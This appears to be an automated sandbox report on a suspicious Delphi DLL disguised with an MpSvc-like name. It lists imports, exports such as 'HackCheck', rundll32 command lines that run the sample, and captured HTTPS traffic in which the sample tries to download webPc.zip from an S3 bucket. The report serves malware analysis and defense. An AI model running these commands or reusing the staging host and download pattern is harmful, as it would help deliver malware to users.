RT_RCDATA	0x2a818c	0xa6b	Delphi compiled form 'TF_MatchMerge'			0.44169478815148105
RT_RCDATA	0x2a8bf8	0xa66	Delphi compiled form 'TMainForm'			0.4560480841472577
RT_RCDATA	0x2a9660	0x981	Delphi compiled form 'TRulesForm'			0.5187011919441019
RT_RCDATA	0x2a9fe4	0x363	Delphi compiled form 'TStats'			0.5686274509803921
RT_GROUP_CURSOR	0x2aa348	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x2aa35c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x2aa370	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa384	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa398	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa3ac	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x2aa3c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_VERSION	0x2aa3d4	0x23c	data	English	United States	0.4493006993006993

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExW, RegOpenKeyExW, RegCloseKey
user32.dll	CharNextW, LoadStringW
kernel32.dll	Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsDBCSLeadByteEx, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetConsoleOutputCP, GetConsoleCP, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, SetFilePointer, SetEndOfFile, ReadFile, GetFileType, GetFileSize, CreateFileW, GetStdHandle, CloseHandle
kernel32.dll	GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc, FreeLibrary
user32.dll	SetClassLongW, GetClassLongW, SetWindowLongW, GetWindowLongW, CreateWindowExW, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCaretPos, SetCapture, SetActiveWindow, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, OffsetRect, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadImageW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsClipboardFormatAvailable, IsChild, IsCharAlphaNumericW, IsCharAlphaW, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMessageExtraInfo, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EndMenu, EndDeferWindowPos, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DeferWindowPos, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CreateAcceleratorTableW, CountClipboardFormats, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, BeginDeferWindowPos, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RoundRect, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyPolyline, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStretchBltMode, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreatePen, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc
version.dll	VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
kernel32.dll	WriteFile, WinExec, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, UnmapViewOfFile, TryEnterCriticalSection, TerminateProcess, SystemTimeToFileTime, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, QueryDosDeviceW, IsDebuggerPresent, OpenProcess, MulDiv, MoveFileW, MapViewOfFile, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryW, LeaveCriticalSection, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVolumeInformationW, GetVersionExW, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLogicalDriveStringsW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesExW, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileMappingW, CreateFileW, CreateEventW, CreateDirectoryW, CompareStringW, CloseHandle
advapi32.dll	RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey
kernel32.dll	Sleep
netapi32.dll	NetApiBufferFree, NetWkstaGetInfo
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitialize, IsEqualGUID
comctl32.dll	InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
user32.dll	EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow
msvcrt.dll	memset, memcpy
shell32.dll	ShellExecuteExW, ShellExecuteW, Shell_NotifyIconW
URLMON.DLL	URLDownloadToFileW
comdlg32.dll	GetSaveFileNameW, GetOpenFileNameW
winspool.drv	OpenPrinterW, EnumPrintersW, DocumentPropertiesW, ClosePrinter
winspool.drv	GetDefaultPrinterW
kernel32.dll	MulDiv
shell32.dll	IsUserAnAdmin

Exports

Name	Ordinal	Address
HackCheck	5	0x647184
ServiceCrtMain	4	0x647184
TMethodImplementationIntercept	3	0x4662f8
__dbk_fcall_wrapper	2	0x41188c
dbkFCallWrapperAddr	1	0x65d634

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2024 19:51:54.899823904 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:54.899861097 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:54.899934053 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:54.909512997 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:54.909549952 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:55.920988083 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:55.921106100 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.002196074 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.002230883 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.003284931 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.003405094 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.006613016 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.048268080 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.337786913 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.337861061 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.337919950 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.338114977 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.338125944 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.338162899 CET	443	49716	3.5.234.32	192.168.2.5
Mar 8, 2024 19:51:56.338171959 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.338215113 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.340034962 CET	49716	443	192.168.2.5	3.5.234.32
Mar 8, 2024 19:51:56.340046883 CET	443	49716	3.5.234.32	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 8, 2024 19:51:54.683963060 CET	52648	53	192.168.2.5	1.1.1.1
Mar 8, 2024 19:51:54.886970043 CET	53	52648	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 8, 2024 19:51:54.683963060 CET	192.168.2.5	1.1.1.1	0xe75a	Standard query (0)	awsserver903203232.s3.sa-east-1.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	awsserver903203232.s3.sa-east-1.amazonaws.com	s3-r-w.sa-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.234.32	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.1.22	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.2.50	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.2.10	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		16.12.0.62	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.164	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.232.130	A (IP address)	IN (0x0001)	false
Mar 8, 2024 19:51:54.886970043 CET	1.1.1.1	192.168.2.5	0xe75a	No error (0)	s3-r-w.sa-east-1.amazonaws.com		3.5.233.162	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

awsserver903203232.s3.sa-east-1.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	3.5.234.32	443	7524	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-08 18:51:56 UTC	314	OUT	GET /webPc.zip HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: awsserver903203232.s3.sa-east-1.amazonaws.com Connection: Keep-Alive
2024-03-08 18:51:56 UTC	305	IN	HTTP/1.1 404 Not Found x-amz-request-id: K2HKDGME41DR45HN x-amz-id-2: vHV/b8VcumvIbfDGSDiVJ5K+95bt7FgHQCKQRQmubVkMWPewHm15YRYSdoTHyYBv1q62H1Rn2S3hhiPydHGYplaW7V0UmA6n Content-Type: application/xml Transfer-Encoding: chunked Date: Fri, 08 Mar 2024 18:51:55 GMT Server: AmazonS3 Connection: close
2024-03-08 18:51:56 UTC	335	IN	Data Raw: 31 34 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 62 75 63 6b 65 74 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 4d 65 73 73 61 67 65 3e 3c 42 75 63 6b 65 74 4e 61 6d 65 3e 61 77 73 73 65 72 76 65 72 39 30 33 32 30 33 32 33 32 3c 2f 42 75 63 6b 65 74 4e 61 6d 65 3e 3c 52 65 71 75 65 73 74 49 64 3e 4b 32 48 4b 44 47 4d 45 34 31 44 52 34 35 48 4e 3c 2f 52 65 71 75 65 73 74 49 64 3e 3c 48 6f 73 74 49 64 3e 76 48 56 2f 62 38 56 63 75 6d 76 49 62 66 44 47 53 44 69 56 4a 35 4b 2b 39 35 62 74 37 46 67 48 51 43 4b Data Ascii: 148<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>awsserver903203232</BucketName><RequestId>K2HKDGME41DR45HN</RequestId><HostId>vHV/b8VcumvIbfDGSDiVJ5K+95bt7FgHQCK
2024-03-08 18:51:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	19:51:43
Start date:	08/03/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll"
Imagebase:	0xf90000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	19:51:43
Start date:	08/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	19:51:43
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	19:51:43
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,HackCheck
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	19:51:43
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",#1
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	19:51:43
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 692
Imagebase:	0x650000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	19:51:46
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,ServiceCrtMain
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	11
Start time:	19:51:49
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\appdata -MpSvc.dll,TMethodImplementationIntercept
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	12
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",HackCheck
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",ServiceCrtMain
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	false

Target ID:	14
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",TMethodImplementationIntercept
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	15
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",dbkFCallWrapperAddr
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	16
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\appdata -MpSvc.dll",__dbk_fcall_wrapper
Imagebase:	0x590000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	high
Has exited:	true

Target ID:	19
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7540 -s 684
Imagebase:	0x650000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	20
Start time:	19:51:52
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 688
Imagebase:	0x650000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	19:51:55
Start date:	08/03/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7524 -s 2152
Imagebase:	0x650000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true